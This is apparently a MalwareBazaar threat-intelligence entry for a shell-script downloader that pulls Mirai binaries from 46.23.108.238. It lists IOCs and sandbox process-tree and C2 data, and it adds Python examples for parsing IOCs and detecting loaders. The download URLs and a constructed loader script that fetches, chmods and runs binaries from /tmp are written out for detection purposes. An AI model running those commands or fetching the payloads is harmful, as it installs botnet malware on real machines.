MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b524ca7cbafab904d0090fa29ebb79941c65ec1c42011aa234cc33f6d47cfdbe. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Prometei

Vendor detections: 8

SHA256 hash: b524ca7cbafab904d0090fa29ebb79941c65ec1c42011aa234cc33f6d47cfdbe
SHA3-384 hash: 2d5e80fa6b8ccd4647cab1770d43704b44ee43f66fdc230704173fe3d286b737ee98b9f68b403f8ad11529d37c485e56
SHA1 hash: e32341cfb0aa624c444ddc823c14f0fc329c6965
MD5 hash: 449633cd5ba6fe0ab0635bb8027acc89
humanhash: ten-romeo-king-summer
File name: b524ca7cbafab904d0090fa29ebb79941c65ec1c42011aa234cc33f6d47cfdbe
Signature: Prometei
File size: 1'646 bytes
First seen: 2026-06-05 05:26:22 UTC
Last seen: Never
File type: sh
MIME type: text/x-shellscript
ssdeep: 12:q0FgsV0Fg20FXc43fX0FCneekX0Fstk0Fs7Cd0FkaX0FaK1FZ0FkuGEX0Fgm0Fjr:vgs+gjXc4kCnasMwzsaK++EsgTCJlG7
TLSH: T1D031A4CA32F10A70ADA0A927726EC80070E6F5CB19CA5FD87CDD39F6418DF497001AA3
TrID: 70.0% (.SH) Linux/UNIX shell script (7000/1); 30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika: shell
Reporter: c2hunter
Tags: Prometei sh wraith
IOCs

URL | Malware sample (SHA256 hash) | Signature | Tags
http://46.23.108.238/mips | d6181fab256865b24e4a8926786083b1476d1f39b792c6126535ff87526a67c0 | Mirai | mirai wraith
http://46.23.108.238/mipsel | 104633cc17f2294fc5a6ac7f7224ab30b26be13908a3a64ade05b048af275f0e | Mirai | mirai wraith
http://46.23.108.238/sh4 | 5ba1f8e403c81c479fb098384ea24c99cd2171827982552ca854e79ea713aefc | Mirai | mirai wraith
http://46.23.108.238/x86 | c4b7349adb2e8fb25431c7f05dbff02eebe436ae6014d0423869c26969d406bd | Mirai | mirai wraith
http://46.23.108.238/armv6l | aab64d03bf58874d37fbf8c07d003885a8dc3a75b30e623a82918ef13f90de7d | Mirai | elf mirai ua-wget
http://46.23.108.238/armv7l | b9f773d7b0318d62c42764c84c27d7618b9268117cb2d8b85f084d3dab4d33f6 | Mirai | elf mirai ua-wget
http://46.23.108.238/i686 | 9f2b9acf5ba4f3c9057eb20457cc5bf43606cb05e8188728aa3c62c834a87ce5 | Mirai | elf mirai ua-wget
http://46.23.108.238/powerpc | 1939d20bc8e84b21e24f7eb6d09860c0071780ec1bb110718109a54c8a5d84b9 | Mirai | elf mirai ua-wget
http://46.23.108.238/i586 | 62eb9e723d53a1b836bfe87e2af0c38b94ddd6a65e14bd2a89b41dca9b2b96d8 | Mirai | elf mirai ua-wget
http://46.23.108.238/m68k | 4286fa6edd5aa7c0a797b15c54cc5b0ebcdc7f1789592557660fe1b037d6781c | Mirai | elf mirai ua-wget
http://46.23.108.238/sparc | n/a | n/a | elf ua-wget
http://46.23.108.238/armv4l | e0c87ef7802f4c48d6f8a51349006ed9f2c5759cdff62288316f678e8b7d676b | Mirai | elf mirai ua-wget
http://46.23.108.238/armv5l | 1c07ec4db3c95af750a0160e579d538a0b5a107d49cbb5966912dddc0f6b0d8e | Mirai | elf mirai ua-wget
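The IOC rows on this page were flattened by text extraction: the download URL and the payload SHA256 were fused into one token, and the signature was fused with the first tag. The Python below is an added example written for this page, not MalwareBazaar code: it splits those rows back into structured IOCs and then matches them against a few constructed proxy-log lines. The log format, the client addresses and the known-signature list are assumptions; the row strings are copied from the page as the extractor left them.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# The 13 IOC rows from this page, exactly as the text extractor flattened them.
RAW_ROWS = [
    "http://46.23.108.238/mipsd6181fab256865b24e4a8926786083b1476d1f39b792c6126535ff87526a67c0 Miraimirai wraith",
    "http://46.23.108.238/mipsel104633cc17f2294fc5a6ac7f7224ab30b26be13908a3a64ade05b048af275f0e Miraimirai wraith",
    "http://46.23.108.238/sh45ba1f8e403c81c479fb098384ea24c99cd2171827982552ca854e79ea713aefc Miraimirai wraith",
    "http://46.23.108.238/x86c4b7349adb2e8fb25431c7f05dbff02eebe436ae6014d0423869c26969d406bd Miraimirai wraith",
    "http://46.23.108.238/armv6laab64d03bf58874d37fbf8c07d003885a8dc3a75b30e623a82918ef13f90de7d Miraielf mirai ua-wget",
    "http://46.23.108.238/armv7lb9f773d7b0318d62c42764c84c27d7618b9268117cb2d8b85f084d3dab4d33f6 Miraielf mirai ua-wget",
    "http://46.23.108.238/i6869f2b9acf5ba4f3c9057eb20457cc5bf43606cb05e8188728aa3c62c834a87ce5 Miraielf mirai ua-wget",
    "http://46.23.108.238/powerpc1939d20bc8e84b21e24f7eb6d09860c0071780ec1bb110718109a54c8a5d84b9 Miraielf mirai ua-wget",
    "http://46.23.108.238/i58662eb9e723d53a1b836bfe87e2af0c38b94ddd6a65e14bd2a89b41dca9b2b96d8 Miraielf mirai ua-wget",
    "http://46.23.108.238/m68k4286fa6edd5aa7c0a797b15c54cc5b0ebcdc7f1789592557660fe1b037d6781c Miraielf mirai ua-wget",
    "http://46.23.108.238/sparcn/an/aelf ua-wget",
    "http://46.23.108.238/armv4le0c87ef7802f4c48d6f8a51349006ed9f2c5759cdff62288316f678e8b7d676b Miraielf mirai ua-wget",
    "http://46.23.108.238/armv5l1c07ec4db3c95af750a0160e579d538a0b5a107d49cbb5966912dddc0f6b0d8e Miraielf mirai ua-wget",
]

HEX64 = re.compile(r"[0-9a-f]{64}")


@dataclass(frozen=True)
class Ioc:
    url: str
    sha256: str | None
    signature: str | None
    tags: tuple[str, ...]


def parse_row(row: str, known_signatures: tuple[str, ...] = ("Mirai",)) -> Ioc:
    """Split one flattened row into URL, SHA256, signature and tags."""
    first, _, rest = row.partition(" ")
    if len(first) > 64 and HEX64.fullmatch(first[-64:]):
        # Cut the hash by LENGTH from the end of the token. Searching for the first hex
        # run instead would split ".../sh4" + "5ba1f8e4..." as ".../sh" + "45ba1f8e...",
        # giving a 65-character "hash" and the wrong download path.
        url, sha = first[:-64], first[-64:]
        head, *more = rest.split() or [""]          # e.g. "Miraielf", ["mirai", "ua-wget"]
        # Signature and first tag are fused with no separator; the signature column only
        # ever holds a known family name (assumption), so match that prefix.
        sig = next((s for s in known_signatures if head.startswith(s)), None)
        first_tag = head[len(sig):] if sig else head
    else:
        # Rows without a sample read "<url>n/an/a<first tag>": hash n/a, signature n/a.
        url, sep, first_tag = first.partition("n/an/a")
        if not sep:
            raise ValueError(f"unrecognised row layout: {row!r}")
        sha = sig = None
        more = rest.split()
    return Ioc(url, sha, sig, tuple(t for t in (first_tag, *more) if t))


def canonical(url: str) -> str:
    """Normalise a URL for matching: drop an explicit :80, query string and fragment."""
    s = urlsplit(url)
    return f"{s.scheme}://{s.hostname}{s.path}"


# Constructed proxy log lines (assumed format: '<client> <method> <url> <status>').
PROXY_LOG = [
    "10.0.0.5 GET http://46.23.108.238:80/x86 200",
    "10.0.0.5 GET http://46.23.108.238/sh4?cache=0 200",
    "10.0.0.9 GET http://example.com/index.html 200",
    "10.0.0.7 GET http://46.23.108.238/sparc 404",
]


def match_proxy_log(lines: list[str], iocs: list[Ioc]) -> list[tuple[str, Ioc]]:
    """Return (client, ioc) for every request whose canonical URL is in the IOC list."""
    by_url = {canonical(i.url): i for i in iocs}
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        client, _method, url, _status = parts[:4]
        ioc = by_url.get(canonical(url))
        if ioc is not None:
            hits.append((client, ioc))
    return hits


if __name__ == "__main__":
    iocs = [parse_row(r) for r in RAW_ROWS]
    for client, ioc in match_proxy_log(PROXY_LOG, iocs):
        print(client, "fetched", ioc.url, "sha256:", ioc.sha256 or "n/a", "tags:", " ".join(ioc.tags))
```

Matching on the canonical URL rather than the raw string is what makes the `:80` and `?cache=0` variants in the constructed log still hit; the sparc row has no sample hash, so a hit on it is a download attempt only and cannot be confirmed by file hash.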

Intelligence


File Origin
# of uploads: 1
# of downloads: 50
Origin country: US

Vendor Threat Intelligence

No detections

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: evasive

Verdict: Malicious
File Type: unix shell
First seen: 2026-06-05T02:35:00Z UTC
Last seen: 2026-06-05T10:21:00Z UTC
Hits: ~10
Detections: HEUR:Trojan-Downloader.Shell.Agent.p, HEUR:Trojan-Downloader.Shell.Agent.gen, HEUR:Trojan-Downloader.Shell.Agent.cx, HEUR:Trojan-Downloader.Shell.Agent.a
Status: terminated
Behavior Graph (sandbox process tree reconstructed from the graph data; pid, image, notable actions):
2481 /usr/bin/sudo
  2488 /tmp/sample.bin (execve); children in order:
    2490 /usr/bin/wget   net, send-data, write-file; sends 132 B to 46.23.108.238:80
    2510 /usr/bin/chmod
    2512 /usr/bin/bash   (clone)
    2516 /usr/bin/rm     delete-file
    2517 /usr/bin/wget   net, send-data, write-file; sends 134 B to 46.23.108.238:80
    2529 /usr/bin/chmod
    2531 /usr/bin/bash   (clone)
    2535 /usr/bin/rm     delete-file
    2537 /usr/bin/wget   net, send-data, write-file; sends 131 B to 46.23.108.238:80
    2548 /usr/bin/chmod
    2550 /usr/bin/bash   (clone)
    2554 /usr/bin/rm     delete-file
    2555 /usr/bin/wget   net, send-data, write-file; sends 131 B to 46.23.108.238:80
    2570 /usr/bin/chmod
    2572 /tmp/x86        net; connects to 8.8.8.8:53
      2573 /tmp/x86      (clone)
      2574 /tmp/x86      (clone)
        2575 /tmp/x86    (clone) net, send-data, zombie; sends 9 B to 46.23.108.238:20008
          2582 /tmp/x86  (clone) net, send-data; sends 16238 B to 46.23.108.238:20008
    2577 /usr/bin/rm     delete-file
    2579 /usr/bin/wget   net, send-data, write-file; sends 134 B to 46.23.108.238:80
    2595 /usr/bin/chmod
    2597 /usr/bin/bash   (clone)
    2603 /usr/bin/rm     delete-file
    2605 /usr/bin/wget   net, send-data, write-file, zombie; sends 134 B to 46.23.108.238:80
Network endpoints: 46.23.108.238:80 (wget downloads), 8.8.8.8:53 (DNS from /tmp/x86), 46.23.108.238:20008 (/tmp/x86, 9 B then 16238 B sent)
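Read as telemetry, the process tree above shows the loader behaviour directly: the script execs wget, chmod and rm over and over from one parent, exactly one downloaded binary (/tmp/x86, matching the /x86 URL in the IOC table) actually runs on the sandbox's architecture, and that child is the only thing talking to 46.23.108.238:20008. The Python below is an added example written for this page, not sandbox or MalwareBazaar code: it takes the pids and images transcribed from the graph as constructed input and implements a behavioural check for that loop, then carves out the payload subtree's non-download endpoints. The three-field event format, the network record format and the thresholds are assumptions.

```python
import os
from collections import Counter, defaultdict

# Constructed input transcribed from the behaviour graph above: (pid, parent_pid, image).
# Real telemetry (auditd EXECVE/SYSCALL records, eBPF exec and clone events) carries the same fields.
EVENTS = [
    (2488, 2481, "/tmp/sample.bin"),
    (2490, 2488, "/usr/bin/wget"), (2510, 2488, "/usr/bin/chmod"), (2512, 2488, "/usr/bin/bash"), (2516, 2488, "/usr/bin/rm"),
    (2517, 2488, "/usr/bin/wget"), (2529, 2488, "/usr/bin/chmod"), (2531, 2488, "/usr/bin/bash"), (2535, 2488, "/usr/bin/rm"),
    (2537, 2488, "/usr/bin/wget"), (2548, 2488, "/usr/bin/chmod"), (2550, 2488, "/usr/bin/bash"), (2554, 2488, "/usr/bin/rm"),
    (2555, 2488, "/usr/bin/wget"), (2570, 2488, "/usr/bin/chmod"), (2572, 2488, "/tmp/x86"),      (2577, 2488, "/usr/bin/rm"),
    (2579, 2488, "/usr/bin/wget"), (2595, 2488, "/usr/bin/chmod"), (2597, 2488, "/usr/bin/bash"), (2603, 2488, "/usr/bin/rm"),
    (2605, 2488, "/usr/bin/wget"),
    (2573, 2572, "/tmp/x86"), (2574, 2572, "/tmp/x86"), (2575, 2574, "/tmp/x86"), (2582, 2575, "/tmp/x86"),
]
# Constructed network records from the same graph: (pid, dst_ip, dst_port, bytes_sent).
NET = [
    (2490, "46.23.108.238", 80, 132), (2517, "46.23.108.238", 80, 134), (2537, "46.23.108.238", 80, 131),
    (2555, "46.23.108.238", 80, 131), (2579, "46.23.108.238", 80, 134), (2605, "46.23.108.238", 80, 134),
    (2572, "8.8.8.8", 53, 0), (2575, "46.23.108.238", 20008, 9), (2582, "46.23.108.238", 20008, 16238),
]

DROP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def find_loader_parents(events, min_cycles=3):
    """Flag a process whose direct children show the fetch -> chmod -> run -> rm loop at least
    min_cycles times AND that executed something from a world-writable drop directory.
    One 'cycle' is bounded by the scarcest of the three utilities (assumed heuristic)."""
    children = defaultdict(list)
    for pid, ppid, image in events:
        children[ppid].append((pid, image))
    findings = []
    for parent, kids in children.items():
        names = Counter(os.path.basename(img) for _, img in kids)
        cycles = min(names["wget"] + names["curl"], names["chmod"], names["rm"])
        dropped = [img for _, img in kids if img.startswith(DROP_DIRS)]
        if cycles >= min_cycles and dropped:
            findings.append({"parent_pid": parent, "cycles": cycles, "dropped_exec": dropped})
    return findings


def subtree_pids(events, root):
    """All pids at or below root; clone and execve both keep the parent link."""
    children = defaultdict(list)
    for pid, ppid, _ in events:
        children[ppid].append(pid)
    seen, stack = set(), [root]
    while stack:
        pid = stack.pop()
        if pid not in seen:
            seen.add(pid)
            stack.extend(children[pid])
    return seen


def c2_candidates(events, net, root, exclude_ports=(53, 80, 443)):
    """Endpoints contacted by the dropped payload's subtree, minus DNS and the download ports.
    What remains is the raw-TCP beacon to block: here 46.23.108.238:20008."""
    pids = subtree_pids(events, root)
    return sorted({(ip, port) for pid, ip, port, _ in net if pid in pids and port not in exclude_ports})


if __name__ == "__main__":
    for f in find_loader_parents(EVENTS):
        print(f)
        for img in f["dropped_exec"]:
            root = next(pid for pid, ppid, image in EVENTS if ppid == f["parent_pid"] and image == img)
            print("  C2 candidates for", img, "->", c2_candidates(EVENTS, NET, root))
```

On this input the parent 2488 scores five cycles (six wget, five chmod, five rm) and one drop-directory exec, and the /tmp/x86 subtree's only non-download, non-DNS endpoint is 46.23.108.238:20008. The four bash clones are the attempts to run payloads built for other architectures; they leave no network trace and are ignored by the check.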
Verdict: Malicious
Threat: Trojan-Downloader.Shell.Agent

Threat name: Linux.Downloader.Morila
Status: Malicious
First seen: 2026-06-05 05:27:24 UTC
File Type: Text (Shell)
AV detection: 24 of 36 (66.67%)
Threat level: 3/5

Result
Malware family: n/a
Score: 7/10
Tags: credential_access defense_evasion discovery linux
Behaviour:
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Changes its process name
Reads system network configuration
Reads process memory
Creates a large amount of network flows
Enumerates running processes
Reads system routing table
File and Directory Permissions Modification
Executes dropped EXE

Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: ach_202412_suspect_bash_script
Author: abuse.ch
Description: Detects suspicious Linux bash scripts

Rule name: MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Author: Anish Bogati
Description: Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference: MalwareBazaar sample lilin.sh
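The second rule's description is itself a detection recipe: a fetch from a numeric IP, a chmod, an execution, repeated for several architectures. The Python below is an added example written for this page, not the YARA rule or any abuse.ch code: it applies those four checks to two constructed scripts (one loader-style, one a benign package fetch) so each criterion can be seen firing or not. The 192.0.2.10 address, the script contents and the architecture name list are constructed assumptions.

```python
import re

# Fetch command followed, within the same shell command, by a dotted-quad IP and a path.
FETCH_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b[^\n;&|]*?(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/([^\s;&|]*)")
# chmod +x or an octal mode (loader scripts almost always use 777).
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b")
# A command that starts by running something relative or from a world-writable drop directory.
EXEC_RE = re.compile(r"(?:^|[;&|])\s*(?:\./|/tmp/|/var/tmp/|/dev/shm/)[^\s;&|]+", re.M)
# Architecture names commonly used as payload file names (assumed list, extend as needed).
ARCH_NAMES = {
    "mips", "mipsel", "mips64", "arm", "arm4", "arm5", "arm6", "arm7", "armv4l", "armv5l", "armv6l",
    "armv7l", "aarch64", "x86", "x86_64", "i386", "i586", "i686", "sh4", "powerpc", "ppc", "m68k",
    "sparc", "arc",
}


def analyze(script: str, min_arches: int = 2) -> dict:
    """Score a shell script against the four loader techniques named in the rule description."""
    fetches = FETCH_RE.findall(script)
    ips = sorted({ip for _, ip, _ in fetches})
    arches = set()
    for _, _, path in fetches:
        # Last path component, lower-cased and stripped of punctuation, e.g. "bins/x86" -> "x86".
        name = re.sub(r"[^a-z0-9_]", "", path.rsplit("/", 1)[-1].lower())
        if name in ARCH_NAMES:
            arches.add(name)
    chmod = CHMOD_RE.search(script) is not None
    exec_calls = len(EXEC_RE.findall(script))
    return {
        "ips": ips,
        "arches": sorted(arches),
        "chmod": chmod,
        "exec_calls": exec_calls,
        # All four together. A single-architecture drop is still worth an alert elsewhere,
        # but it is not what this rule describes.
        "is_loader": bool(ips) and chmod and exec_calls > 0 and len(arches) >= min_arches,
    }


# Constructed loader-style script (TEST-NET address, not the sample's real contents).
LOADER = """#!/bin/sh
cd /tmp || cd /var/run || cd /dev/shm
wget http://192.0.2.10/mips -O mips; chmod 777 mips; ./mips; rm -f mips
wget http://192.0.2.10/mipsel -O mipsel; chmod 777 mipsel; ./mipsel; rm -f mipsel
wget http://192.0.2.10/sh4 -O sh4; chmod 777 sh4; ./sh4; rm -f sh4
curl -s http://192.0.2.10:8080/bins/x86 -o x86; chmod +x x86; ./x86; rm -f x86
"""

# Constructed benign script: downloads from a hostname, no chmod, nothing executed from /tmp.
BENIGN = """#!/bin/sh
set -e
wget -q https://example.com/release/pkg.tar.gz -O /tmp/pkg.tar.gz
tar -xzf /tmp/pkg.tar.gz -C /opt/pkg
"""

if __name__ == "__main__":
    for label, text in (("loader", LOADER), ("benign", BENIGN)):
        print(label, analyze(text))
```

The architecture count is the check that separates a loader from an ordinary "download a binary and run it" installer, which is why it sits behind a threshold rather than being a boolean; lowering `min_arches` to 1 turns the function into a broader but noisier "drops and runs from /tmp" heuristic.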

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Prometei: sh b524ca7cbafab904d0090fa29ebb79941c65ec1c42011aa234cc33f6d47cfdbe (this sample)

Comments